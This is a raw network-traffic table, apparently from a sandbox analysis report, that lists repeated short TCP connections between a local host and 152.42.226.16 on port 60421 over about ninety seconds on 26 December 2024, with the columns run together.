                      Dec 26, 2024 19:29:44.104906082 CET4993260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:44.201081991 CET6042149926152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:44.224625111 CET6042149932152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:44.224720001 CET4993260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:44.225285053 CET4993260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:44.344976902 CET6042149932152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:46.894985914 CET6042149932152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:46.895072937 CET4993260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:46.895216942 CET4993260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:46.957362890 CET4993860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:47.014902115 CET6042149932152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:47.077934980 CET6042149938152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:47.078071117 CET4993860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:47.078305960 CET4993860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:47.199197054 CET6042149938152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:47.199352980 CET4993860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:47.201400042 CET4994260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:47.321083069 CET6042149942152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:47.321310997 CET4994260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:47.323357105 CET4994260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:47.443597078 CET6042149942152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:49.995614052 CET6042149942152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:49.995683908 CET4994260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:49.995820045 CET4994260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:50.024040937 CET4994960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:50.116893053 CET6042149942152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:50.146794081 CET6042149949152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:50.146879911 CET4994960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:50.147377968 CET4994960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:50.266851902 CET6042149949152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:52.799715042 CET6042149949152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:52.799825907 CET4994960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:52.800255060 CET4994960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:52.872826099 CET4995560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:52.920063019 CET6042149949152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:52.992830038 CET6042149955152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:52.992965937 CET4995560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:52.993634939 CET4995560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:53.113939047 CET6042149955152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:53.114906073 CET6042149955152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:53.115113974 CET4995560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:53.138324022 CET4995760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:53.258008957 CET6042149957152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:53.258146048 CET4995760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:53.258572102 CET4995760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:53.378189087 CET6042149957152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:55.909492016 CET6042149957152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:55.909579992 CET4995760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:55.909722090 CET4995760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:55.926834106 CET4996360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:56.029212952 CET6042149957152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:56.046681881 CET6042149963152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:56.046794891 CET4996360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:56.047269106 CET4996360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:56.166966915 CET6042149963152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:58.721801996 CET6042149963152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:58.725526094 CET4996360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:58.725526094 CET4996360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:58.845438957 CET6042149963152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:58.857001066 CET4996960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:58.977519035 CET6042149969152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:58.977783918 CET4996960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:58.981395960 CET4996960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:59.101290941 CET6042149969152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:59.101377964 CET4996960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:59.125376940 CET4997460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:59.245062113 CET6042149974152.42.226.16192.168.2.5
                      Dec 26, 2024 19:29:59.245373011 CET4997460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:59.249411106 CET4997460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:29:59.368942976 CET6042149974152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:01.910365105 CET6042149974152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:01.910442114 CET4997460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:01.910542011 CET4997460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:01.928819895 CET4998060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:02.030466080 CET6042149974152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:02.048465014 CET6042149980152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:02.048551083 CET4998060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:02.049151897 CET4998060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:02.168848991 CET6042149980152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:04.708005905 CET6042149980152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:04.708378077 CET4998060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:04.708378077 CET4998060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:04.787604094 CET4998760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:04.828234911 CET6042149980152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:04.907239914 CET6042149987152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:04.907835960 CET4998760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:04.908099890 CET4998760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:05.027853012 CET6042149987152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:05.035288095 CET4998760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:05.047489882 CET4998860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:05.167618036 CET6042149988152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:05.168525934 CET4998860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:05.168525934 CET4998860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:05.288163900 CET6042149988152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:07.859963894 CET6042149988152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:07.860081911 CET4998860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:07.860181093 CET4998860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:07.876797915 CET4999460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:07.990998983 CET6042149988152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:08.048108101 CET6042149994152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:08.048186064 CET4999460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:08.048909903 CET4999460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:08.168430090 CET6042149994152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:10.707684040 CET6042149994152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:10.707856894 CET4999460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:10.707952023 CET4999460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:10.760998964 CET5000460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:10.827461004 CET6042149994152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:10.880561113 CET6042150004152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:10.880806923 CET5000460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:10.881403923 CET5000460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:11.001173019 CET6042150004152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:11.001600981 CET5000460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:11.029423952 CET5000560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:11.148920059 CET6042150005152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:11.149980068 CET5000560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:11.149980068 CET5000560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:11.269985914 CET6042150005152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:13.817203045 CET6042150005152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:13.817297935 CET5000560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:13.817429066 CET5000560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:13.834583044 CET5001160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:13.936955929 CET6042150005152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:13.954209089 CET6042150011152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:13.954302073 CET5001160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:13.954747915 CET5001160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:14.074266911 CET6042150011152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:16.613300085 CET6042150011152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:16.613596916 CET5001160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:16.613817930 CET5001160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:16.699413061 CET5001860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:16.738692999 CET6042150011152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:16.819000006 CET6042150018152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:16.819504023 CET5001860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:16.820271015 CET5001860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:16.939987898 CET6042150018152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:16.943677902 CET5001860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:16.967649937 CET5001960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:17.087395906 CET6042150019152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:17.087538004 CET5001960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:17.091437101 CET5001960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:17.211369038 CET6042150019152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:19.803093910 CET6042150019152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:19.803150892 CET5001960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:19.803344965 CET5001960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:19.828159094 CET5002560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:19.922771931 CET6042150019152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:19.947804928 CET6042150025152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:19.947911024 CET5002560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:19.950566053 CET5002560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:20.071218014 CET6042150025152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:22.597563982 CET6042150025152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:22.599615097 CET5002560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:22.599615097 CET5002560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:22.681669950 CET5003460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:22.720448971 CET6042150025152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:22.801686049 CET6042150034152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:22.801940918 CET5003460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:22.802051067 CET5003460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:22.922291994 CET6042150034152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:22.923517942 CET5003460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:22.956459999 CET5003560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:23.076014042 CET6042150035152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:23.081526041 CET5003560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:23.084423065 CET5003560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:23.204081059 CET6042150035152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:25.828970909 CET6042150035152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:25.829057932 CET5003560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:25.829200029 CET5003560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:25.845716000 CET5004260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:26.124006033 CET6042150035152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:26.124366045 CET6042150042152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:26.124440908 CET5004260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:26.132121086 CET5004260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:26.251674891 CET6042150042152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:28.784693956 CET6042150042152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:28.784868002 CET5004260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:28.785006046 CET5004260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:28.785722971 CET5004860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:28.904833078 CET6042150042152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:28.905550957 CET6042150048152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:28.905694962 CET5004860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:28.906076908 CET5004860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:29.044656038 CET5004960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:29.224884033 CET6042150049152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:29.224955082 CET6042150048152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:29.225121021 CET5004960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:29.225121021 CET5004860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:29.226773024 CET5004960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:29.346472979 CET6042150049152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:31.881264925 CET6042150049152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:31.881326914 CET5004960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:31.881436110 CET5004960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:31.882332087 CET5005260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:32.000874043 CET6042150049152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:32.001799107 CET6042150052152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:32.001902103 CET5005260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:32.002615929 CET5005260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:32.123079062 CET6042150052152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:34.660274982 CET6042150052152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:34.661669970 CET5005260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:34.661669970 CET5005260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:34.665445089 CET5005360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:34.788024902 CET6042150052152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:34.791635036 CET6042150053152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:34.795840979 CET5005360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:34.795840979 CET5005360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:34.918905973 CET6042150053152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:34.919421911 CET5005360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:34.951684952 CET5005460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:35.073028088 CET6042150054152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:35.073256969 CET5005460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:35.073930025 CET5005460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:35.193660975 CET6042150054152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:37.723402977 CET6042150054152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:37.723474026 CET5005460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:37.723629951 CET5005460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:37.724576950 CET5005560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:37.843333960 CET6042150054152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:37.844048977 CET6042150055152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:37.844130039 CET5005560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:37.844918013 CET5005560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:37.964942932 CET6042150055152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:40.520375967 CET6042150055152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:40.520440102 CET5005560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:40.520524025 CET5005560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:40.521418095 CET5005660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:40.640268087 CET6042150055152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:40.641180038 CET6042150056152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:40.641415119 CET5005660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:40.641500950 CET5005660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:40.761616945 CET6042150056152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:40.765563965 CET5005660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:40.797477007 CET5005760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:40.917380095 CET6042150057152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:40.918184996 CET5005760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:40.918184996 CET5005760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:41.038047075 CET6042150057152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:43.582778931 CET6042150057152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:43.582931995 CET5005760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:43.582973003 CET5005760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:43.585458040 CET5005860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:43.702748060 CET6042150057152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:43.705249071 CET6042150058152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:43.705353022 CET5005860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:43.705996990 CET5005860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:43.825819016 CET6042150058152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:46.408020020 CET6042150058152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:46.408102036 CET5005860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:46.408188105 CET5005860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:46.408704042 CET5005960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:46.528908968 CET6042150058152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:46.529304981 CET6042150059152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:46.529412985 CET5005960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:46.529712915 CET5005960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:46.650232077 CET6042150059152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:46.654006004 CET5006060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:46.654010057 CET5005960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:46.773933887 CET6042150060152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:46.776372910 CET5006060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:46.776372910 CET5006060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:46.899033070 CET6042150060152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:49.457849026 CET6042150060152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:49.464020014 CET5006060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:49.501461983 CET5006060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:49.502177000 CET5006160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:49.621234894 CET6042150060152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:49.622030973 CET6042150061152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:49.622114897 CET5006160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:49.747437000 CET5006160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:49.867033005 CET6042150061152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:52.300656080 CET6042150061152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:52.300741911 CET5006160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:52.308840990 CET5006160421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:52.309724092 CET5006260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:52.428397894 CET6042150061152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:52.429203987 CET6042150062152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:52.429295063 CET5006260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:52.432590961 CET5006260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:52.554704905 CET6042150062152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:52.557141066 CET6042150062152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:52.557188034 CET5006260421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:52.628762960 CET5006360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:52.748272896 CET6042150063152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:52.748410940 CET5006360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:52.748940945 CET5006360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:52.868419886 CET6042150063152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:55.443598032 CET6042150063152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:55.445758104 CET5006360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:55.445827007 CET5006360421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:55.446336985 CET5006460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:55.565531015 CET6042150063152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:55.565799952 CET6042150064152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:55.568552971 CET5006460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:55.571507931 CET5006460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:55.691004992 CET6042150064152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:58.262999058 CET6042150064152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:58.263076067 CET5006460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:58.263262987 CET5006460421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:58.264172077 CET5006560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:58.383532047 CET6042150064152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:58.384380102 CET6042150065152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:58.384478092 CET5006560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:58.384762049 CET5006560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:58.498411894 CET5006660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:58.506336927 CET6042150065152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:58.506391048 CET5006560421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:58.622658968 CET6042150066152.42.226.16192.168.2.5
                      Dec 26, 2024 19:30:58.623652935 CET5006660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:58.624104977 CET5006660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:30:58.747620106 CET6042150066152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:01.286268950 CET6042150066152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:01.288625002 CET5006660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:01.288625956 CET5006660421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:01.300154924 CET5006760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:01.408225060 CET6042150066152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:01.420120001 CET6042150067152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:01.424407005 CET5006760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:01.428456068 CET5006760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:01.549350977 CET6042150067152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:04.082334042 CET6042150067152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:04.082400084 CET5006760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:04.082515955 CET5006760421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:04.083331108 CET5006860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:04.202142000 CET6042150067152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:04.202826977 CET6042150068152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:04.202898026 CET5006860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:04.203799009 CET5006860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:04.323719978 CET6042150068152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:04.323807955 CET5006860421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:04.326790094 CET5006960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:04.446332932 CET6042150069152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:04.446402073 CET5006960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:04.446907043 CET5006960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:04.566407919 CET6042150069152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:07.098767042 CET6042150069152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:07.098896027 CET5006960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:07.099013090 CET5006960421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:07.101505041 CET5007060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:07.218580008 CET6042150069152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:07.221878052 CET6042150070152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:07.221977949 CET5007060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:07.225542068 CET5007060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:07.351917028 CET6042150070152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:09.923690081 CET6042150070152.42.226.16192.168.2.5
                      Dec 26, 2024 19:31:09.923749924 CET5007060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:09.923835993 CET5007060421192.168.2.5152.42.226.16
                      Dec 26, 2024 19:31:09.924503088 CET5007160421192.168.2.5152.42.226.16
